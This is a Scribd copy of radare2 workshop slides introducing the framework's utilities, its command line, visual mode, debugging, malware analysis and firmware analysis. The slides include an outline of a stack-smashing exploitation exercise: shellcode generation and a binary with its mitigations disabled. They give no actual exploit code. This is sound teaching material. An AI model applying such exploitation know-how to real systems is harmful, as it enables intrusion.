Scribd
Upload
32 views68 pages

Slides

Uploaded by

Jaime Pardos
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
32 views68 pages

Slides

Uploaded by

Jaime Pardos
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

radare2

First r2babies steps - Long Version

Maxime Morin (@Maijin212), Anton Kochkov (@akochkov)


August 16, 2015
ISSA South Africa
maxime morin

∙ 22 y/o french expat @ Luxembourg


∙ Food, Travel and Languages <3
∙ I hate Bullshit
∙ [Link] CERT team leader (2days/week) and incident response
@ European Commission CSIRC (3days/week)
∙ User of radare2 (impossibru!)
∙ I’m creating tests + documentation

1
anton kochkov

∙ Living in Moscow, Russia


∙ Reverse Engineering, Languages and Travel
∙ Reverse engineer, firmware security analyst at SecurityCode Ltd.
∙ Member of r2 crew

2
generality on radare2 framework

∙ r1 2006, r2 2009
∙ Multi-(OSes|Archs|Bindings|FileFormats|...)
∙ 10 tools based on the framework
∙ Around 111 contributors from various fields
∙ GSOC + RSOC
∙ CLI/VisualMode/GUI/WebGUI
∙ around 350K LOC

3
Installation !

4
installation

∙ Always use git version!


∙ Use the provided VM on SSH (radare:radare / root:radare)
∙ git clone [Link] && cd radare2 &&
./sys/[Link]
∙ Use the Windows installer [Link]

5
utilities
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

7
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

8
utilities: rax2

rax2 — Base converter

$ rax2 10

0xa

$ rax2 33 0x41 0101b

0x21 65 0x5

$ rax2 -s 4142434445

ABCDE

$ rax2 0x5*101b+5

30 9
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

10
utilities: rabin2

rabin2 — Binary program info extractor

$ rabin2 -e

Entrypoints

$ rabin2 -i

Shows imports

$ rabin2 -zz

Shows strings

$ rabin2 -g

Show all possible information 11


utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

12
utilities: rasm2

rasm2 — assembler and disassembler tool

$ rasm2 -a x86 -b 32 ’mov eax, 33’

Assemble

$ rasm2 -d 9090

Disassemble

$ rasm2 -L

List supported asm plugins

$ rasm2 -a x86 -b 32 ’mov eax, 33’ -C

Output in C format 13
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

14
utilities: radiff2

radiff2 — unified binary diffing utility

$ radiff2 original patched

Code diffing

$ radiff2 -C original patched

Code diffing using graphdiff algorithm

$ radiff2 -g main -a x86 -b32 original patched

Graph diff output of given symbol, or between two functions, at given


offsets: one for each binary.
15
utilities: radiff2 — graph example

/bin/true /bin/false

16
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

17
utilities: rafind2

rafind2 — Advanced commandline hexadecimal editor

$ rafind2 -X -s passwd [Link]

Search for the string passwd

18
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

19
utilities: rahash2

rahash2 — block based hashing utility

$ rahash2 -a all [Link]

Display hashes of the whole file with all algos

$ rahash2 -B -b 512 -a md5

Compute md5 per block of 512

$ rahash2 -B -b 512 -a entropy

Compute md5 per block of 512

$ echo -n ”admin” | rahash2 -a md5 -s ”

Compute md5 of the string admin 20


utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

21
radare2 — command line
1 command <—> 1 reverse-engineering’notion

Keep in mind that:

1. Every character has a meaning i.e (w = write, p = print)


2. Every command is a succession of character i.e pdf = p <-> print d
<-> disassemble f <-> function
3. Every command is documented with cmd?, i.e pdf?,?, ???, ???, ?$?,
?@?

23
the # command — hashing command

1. Open a file with radare2 radare2 fi[Link]


2. Get Usage on the command #? Usage: #algo <size> @ addr
3. List of all existing algorithms ##
4. SHA1 #sha1
5. Hashing from the begin #sha1 @ 0
6. with a hash block size corresponding to the size of the file #sha1
$s @ 0x0

This command is same as rahash2 -a sha1 fi[Link]

24
the i command — information command

1. Get Usage on the command i?


2. Same as rabin2
3. izj for displaying in json
4. internal commands: ,̃ ls, {}, ..

25
radare2 — ’major’ command example: pf

Quick Demo

26
radare2 — cli main commands

1. r2 -A or r2 then aaa : Analysis


2. s : Seek
3. pdf : Print disassemble function
4. af? : Analyse function
5. ax? : Analyse XREF
6. /? : Search
7. ps? : Print strings
8. C? : Comments
9. w? : Write

27
radare2 — visual mode
radare2 — visual mode main commands

1. V? : Visual help
2. p/P : rotate print modes
3. move using arrows/hjkl
4. o : seek to
5. e : r2configurator
6. v : Function list
7. _ : HUD
8. V : ASCII Graph
0-9 : Jump to function
9. u : Go back

29
radare2 — webui
radare2 — webui

r2 -A -c=H filename

31
radare2 — debugger
radare2 — debugger

1. radare2 -d
2. Quickly switch to Visual debugger mode: Vpp
3. OllyDBG/IDApro shortcuts friendly

33
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

34
rarun2

Rarun2 — run programs in exotic environments

1. Environnment setup tools for radare2


2. most useful with debugger
3. aslr, stdout, arguments, r2preload ...

35
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

36
ragg2/ragg2-cc

Ragg2/Ragg2-cc — frontend for compiling shellcodes

37
debugging

∙ Native local debug (r2 -d)


∙ r2 agent (rap:// protocol)
∙ GDB remote protocol support
∙ WinDBG remote protocol support

38
native debug

Better to use the visual mode

r2 -d /bin/ls

39
gdb protocol

Just run gdbserver somewhere

and connect r2 to it:

r2 -D gdb -d /bin/ls gdb://[Link]:4589

40
gdb protocol + wine

Winedbg allows to run windows command

using the gdbserver too:

winedbg –gdb –no-start [Link]

r2 -a x86 -b 32 -D gdb -d [Link] gdb://localhost:44840

41
windbg

r2 allows to connect WinDBG/KD1

For example, to debug windows kernel via the serial port:

bcdedit /debug on

bcdedit /dbgsettings serial debugport:1 baudrate:115200

then connect r2:

r2 -a x86 -b 32 -D wind windbg:///tmp/[Link]

For now, connecting to the QEMU and VirtualBox are tested


1 r2windbg.

42
debugging omap bootrom

Just run it in the modified qemu [Link]

./configure –target-list=arm-softmmu ; make ; sudo make install

qemu-system-arm -M milestone -m 256 -L . -bios [Link]


-mtdblock [Link] -d in_asm,cpu,exec -nographic -s -S

r2 -D gdb -b arm gdb://localhost:9999

Same approach could be used for any customized hardware

43
gdb protocol + wine

Winedbg allows to run windows command

using the gdbserver too:

winedbg –gdb –no-start [Link]

r2 -a x86 -b 32 -D gdb -d [Link] gdb://localhost:44840

44
scripting capabilities

Available for a lot of programming languages

Radare2 Bindings —

R2Pipe —

Demo time !

45
now your turn!

∙ Crackmes: IOLI-Crackme, flare-on 2015 challenges


∙ Exploitation: pwn1, pwn2, ropasaurus
∙ Malware(1/3): Practical malware analysis samples
∙ Malware(2/3): Any RAT samples see decoder on:
[Link]
∙ Malware(3/3): [Link], MalekalDB
∙ Firmware/BIOS/UEFI: TODO

46
documentation

∙ Website: [Link]
∙ Blog: [Link]
∙ Book: [Link]

47
exploitation (jvoisin work :-) )
49
stack

...

...

stack frame 1 ...

...

...

stack frame 2 ...

...

...

50
stack smashing

51
stack smashing

51
pwn1
pwn1

∙ Written for this workshop


∙ Oldschool classic example
∙ You’ll write the final exploit

53
hu-ho.

54
de bruijn patterns

55
exploit!

∙ No ALSR
∙ No NX
∙ No Canary

56
generate shellcode

57
your turn!

Write a working exploit!

58
show me yours, i’ll show you mine

59
malware analysis
other r2 commands i use frequently at work

1. #?
2. ?d, i?
3. Visual mode and associated (VVV, Vv, ;, ...)
4. Analysis command (axt, agf, ...)
5. /m?, /C?, pf, px?, p6d, p=
6. yara, zF
7. pr, wt
8. basic zsh/bash scripting, r2-pipe

61
firmware analysis
uefi analysis

∙ Dump the image using flashrom or hardware


∙ Unpack the image using UEFITool2
∙ Open the selected PE or TE file using r2

2 uefitool.

63
old legacy bios analysis

∙ Load the whole image or unpack it using bios_extract3


∙ Open it using the correct segment and offset
∙ r2 load the whole BIOS image automatically
∙ r2 asrock_p4i65g.bin
∙ >. asrock_p4i65g.r2

3 bios-extract.

64
documentation

∙ Website: [Link]
∙ Blog: [Link]
∙ Book: [Link]

65
references

You might also like